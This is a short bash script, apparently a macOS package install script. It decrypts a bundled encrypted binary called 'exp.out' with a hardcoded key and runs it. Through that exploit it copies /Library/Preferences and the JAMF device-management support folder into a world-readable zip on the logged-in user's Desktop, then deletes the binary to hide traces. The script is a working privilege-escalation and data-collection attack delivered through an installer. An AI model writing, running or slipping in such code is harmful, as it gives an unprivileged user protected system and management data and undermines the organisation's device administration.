#!/usr/bin/env bash

res="$(dirname "$(dirname "$0")")/Resources"
exploit="/tmp/exp.out"
logfile="/tmp/package_log.txt"

exec 3>&1 4>&2
trap 'exec 2>&4 1>&3' 0 1 2 3
exec 1>"$logfile" 2>&1

# Run only if directory on Desktop exists with the current year and day
echo "Decrypting and preparing exploit."
openssl des3 -d -in "$res/exp.out.des3" -k b51861c95142fce29aef7b6416fa21d5 > "$exploit"
chmod +x "$exploit"

"$exploit" <<'EOF'
dumpdir="/tmp/dump"
mkdir -p "$dumpdir"
for path in /Library/Preferences /Library/Application\ Support/JAMF; do
    echo "$path"
    mkdir -p "/tmp/dump$(dirname "$path")"
    cp -r "$path" "/tmp/dump$path"
done
(cd "$dumpdir" && zip -r "$dumpdir.zip" *)
rm -rf "$dumpdir"
chmod 777 "$dumpdir.zip"
user="$(stat -f "%Su" /dev/console)"
chown "$user" "$dumpdir.zip"
mv "$dumpdir.zip" "/Users/$user/Desktop/"
EOF
wait
rm "$exploit"
echo "Done."
